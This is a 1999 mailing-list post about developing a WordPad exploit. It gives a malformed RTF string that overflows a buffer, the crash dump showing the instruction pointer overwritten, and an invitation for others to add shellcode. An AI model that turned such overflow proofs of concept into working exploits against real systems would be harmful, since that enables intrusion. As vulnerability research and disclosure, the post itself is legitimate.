Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: development of wordpad exploit

From: jepaulson () BANENG COM (Jason Paulson)
Date: Fri, 19 Nov 1999 10:56:29 -0600

I am also interested in learning.
and I have a small donation to make.
I don't know the opcodes for an intel processor but I have control of the
stack. So if some Assembly guru will fill in the empty space with some
interesting opcodes I think we are in business.

the following contents of an rtf document: (probably wraped, should all be
one line)

{\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKLMNOPQRSTUVWXYZ0AAB
BCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZAAABBBCCCDDDEEEFFFGGGHHHIII
JJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAAABBBBCCCCDDDDEEEEFFFFG
GGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZ
ZZZAAAAABBBBBCCCCCDDDDDEEEEEFFFFFGGGGGHHHHHIIIIIJJJJJKKKKKLLLLLMMMMMNNNNNOOO
OOPPPPPQQQQQRRRRRSSSSSTTTTTUUUUUVVVVVWWWWWXXXXXYYYYYZZZZZ}

will cause the following the following dump:

WORDPAD caused an invalid page fault in
module <unknown> at 00de:41414141.
Registers:
EAX=00000102 CS=017f EIP=41414141 EFLGS=00010212
EBX=0056e364 SS=0187 ESP=0056e324 EBP=00000409
ECX=0056e364 DS=0187 ESI=0056e364 FS=57a7
EDX=fffffff3 ES=0187 EDI=0056e418 GS=609e
Bytes at CS:EIP:

Stack dump:
44434241 48474645 4c4b4a49 504f4e4d 54535251 58575655 00005a59 00500f1c
00000000 00000000 00000000 00500e90 480268ad 00500f40 00500e90 80000002

notice that we control EIP (41414141, all As)
and the the first part of the stack is also under our control
(44434241 48474645 = DCBA HGFE) this is reversed because of the way the i386
architecture stores memory pointers.

Cheers,

Jason
Previous By Date Next
Previous By Thread Next

Current thread: